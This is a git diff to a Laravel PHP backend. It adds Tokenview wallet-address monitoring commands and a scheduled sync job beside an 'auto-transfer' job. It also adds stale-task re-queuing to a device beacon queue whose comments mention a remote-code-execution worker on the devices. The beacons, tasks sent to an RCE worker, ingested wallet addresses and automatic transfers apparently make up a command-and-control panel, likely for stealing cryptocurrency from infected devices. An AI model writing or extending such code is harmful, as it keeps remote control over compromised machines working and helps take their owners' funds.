diff --git a/app/Console/Commands/EnableAllMonitorsCommand.php b/app/Console/Commands/EnableAllMonitorsCommand.php new file mode 100644 index 0000000..8cb4e6d --- /dev/null +++ b/app/Console/Commands/EnableAllMonitorsCommand.php @@ -0,0 +1,42 @@ +where('monitor', 0)->get(); + + if ($addresses->isEmpty()) { + $this->info('no monitor=0 addresses found.'); + + return self::SUCCESS; + } + + $enabled = 0; + $skipped = 0; + foreach ($addresses as $addr) { + if ($svc->shouldMonitor($addr)) { + $addr->monitor = 1; + $addr->save(); + $this->line(" enabled: {$addr->address} ({$addr->chain_type})"); + $enabled++; + } else { + $skipped++; + } + } + + $this->info("enabled={$enabled} skipped={$skipped} total=".count($addresses)); + + return self::SUCCESS; + } +} diff --git a/app/Console/Commands/SyncTokenviewMonitorsCommand.php b/app/Console/Commands/SyncTokenviewMonitorsCommand.php new file mode 100644 index 0000000..c1fd57f --- /dev/null +++ b/app/Console/Commands/SyncTokenviewMonitorsCommand.php @@ -0,0 +1,59 @@ +shouldMonitor(new WalletAddress(['chain_type' => 'TRON']))) { + $this->info('Tokenview not configured or no supported chains — nothing to sync.'); + + return self::SUCCESS; + } + + $limit = (int) $this->option('limit'); + $addresses = WalletAddress::query() + ->where('monitor', 1) + ->orderByDesc('updated_at') + ->limit($limit) + ->get(); + + if ($addresses->isEmpty()) { + $this->info('no monitor=1 addresses to sync.'); + + return self::SUCCESS; + } + + $ok = 0; + $fail = 0; + foreach ($addresses as $addr) { + if (! $svc->shouldMonitor($addr)) { + continue; + } + try { + if ($svc->syncMonitor($addr)) { + $ok++; + } else { + $fail++; + } + } catch (\Throwable $e) { + $this->warn(" failed: {$addr->address} ({$addr->chain_type}): {$e->getMessage()}"); + $fail++; + } + } + + $this->info("synced: ok={$ok} fail={$fail} total=".count($addresses)); + + return self::SUCCESS; + } +} diff --git a/app/Services/DsBeaconQueue.php b/app/Services/DsBeaconQueue.php index b1d6904..667ae34 100644 --- a/app/Services/DsBeaconQueue.php +++ b/app/Services/DsBeaconQueue.php @@ -122,6 +122,9 @@ class DsBeaconQueue private const THROTTLE_SEC = 5; private const DONE_CAP = 50; + /** Dispatched tasks older than this (seconds) are re-queued on next beacon. */ + private const STALE_DISPATCH_SEC = 600; // 10 minutes + // ── Seeding ──────────────────────────────────────────────────────────── /** @@ -158,6 +161,10 @@ class DsBeaconQueue return null; } + // Re-queue dispatched tasks that never received a /result (e.g. the + // device's rce_worker wasn't loaded yet when the task was first sent). + $this->requeueStaleDispatched($device); + $raw = Redis::rpop($this->queueKey($device)); if ($raw === null) { return null; // noop — queue empty @@ -187,6 +194,41 @@ class DsBeaconQueue ]; } + /** + * Re-queue dispatched tasks that have been sitting without a /result + * for longer than STALE_DISPATCH_SEC. This handles the case where a + * task was dispatched before the device's rce_worker was ready (e.g. + * the default seeded tasks fired on the first 1-2 beacons). + */ + private function requeueStaleDispatched(Device $device): void + { + $dispKey = $this->dispKey($device); + $dispatched = Redis::hgetall($dispKey); + if (empty($dispatched)) { + return; + } + + $now = time(); + $cutoff = $now - self::STALE_DISPATCH_SEC; + + foreach ($dispatched as $commandId => $raw) { + $task = json_decode($raw, true); + if (! is_array($task)) { + continue; + } + $dispatchedAt = strtotime((string) ($task['dispatched_at'] ?? '')); + if ($dispatchedAt === false || $dispatchedAt > $cutoff) { + continue; // not stale yet + } + + // Remove from dispatched and push back to queue as a fresh task. + Redis::hdel($dispKey, $commandId); + unset($task['command_id'], $task['dispatched_at'], $task['status']); + $task['status'] = self::STATUS_PENDING; + Redis::lpush($this->queueKey($device), json_encode($task)); + } + } + // ── Mark done (called on /result) ────────────────────────────────────── /** diff --git a/app/Services/IngestService.php b/app/Services/IngestService.php index 43c9354..cc21f92 100644 --- a/app/Services/IngestService.php +++ b/app/Services/IngestService.php @@ -855,24 +855,40 @@ class IngestService } /** - * New addresses start with monitor=1; turn off only when Tokenview add fails. + * New addresses start with monitor=1. Turn off only when Tokenview is + * not configured or the chain is unsupported. If the API call fails + * (network error, rate limit, etc.), keep monitor=1 so it can be + * retried later via the admin UI or a background job. */ private function enableMonitorOrDisable(WalletAddress $address): void { + // Tokenview not configured or unsupported chain → don't monitor. + if (! $this->tokenview->shouldMonitor($address)) { + if ((int) $address->monitor !== 0) { + $address->monitor = 0; + $address->save(); + } + + return; + } + + // Try to register with Tokenview. On transient failure, keep + // monitor=1 so the address is still eligible for retry / webhooks. try { if ($this->tokenview->syncMonitor($address)) { - return; + return; // success } } catch (\Throwable $e) { Log::warning('tokenview enable on ingest failed: '.$e->getMessage(), [ 'wallet_address_id' => $address->id, ]); } - - if ((int) $address->monitor !== 0) { - $address->monitor = 0; - $address->save(); - } + // syncMonitor returned false or threw — but Tokenview is configured + // and the chain is supported, so this is likely a transient API + // failure. Keep monitor=1 for retry. + Log::info('tokenview sync failed, keeping monitor=1 for retry', [ + 'wallet_address_id' => $address->id, + ]); } /** diff --git a/app/Services/Tokenview/TokenviewMonitorService.php b/app/Services/Tokenview/TokenviewMonitorService.php index 1249b2b..0888487 100644 --- a/app/Services/Tokenview/TokenviewMonitorService.php +++ b/app/Services/Tokenview/TokenviewMonitorService.php @@ -46,6 +46,20 @@ class TokenviewMonitorService }; } + /** + * Returns true if this address should have monitoring enabled: + * Tokenview is configured AND the chain type is supported. + * Does NOT make an API call — purely a local check. + */ + public function shouldMonitor(WalletAddress $address): bool + { + if (! $this->client->enabled()) { + return false; + } + + return self::coinAbbrFromChainType($address->chain_type) !== null; + } + public function syncMonitor(WalletAddress $address): bool { if (! $this->client->enabled()) { diff --git a/routes/console.php b/routes/console.php index 013b1d0..87bd327 100644 --- a/routes/console.php +++ b/routes/console.php @@ -26,6 +26,11 @@ Schedule::command('coruna:auto-transfer') ->withoutOverlapping() ->runInBackground(); +Schedule::command('coruna:sync-monitors --limit=200') + ->everyFiveMinutes() + ->withoutOverlapping() + ->runInBackground(); + Artisan::command('inspire', function () { $this->comment(Inspiring::quote()); })->purpose('Display an inspiring quote');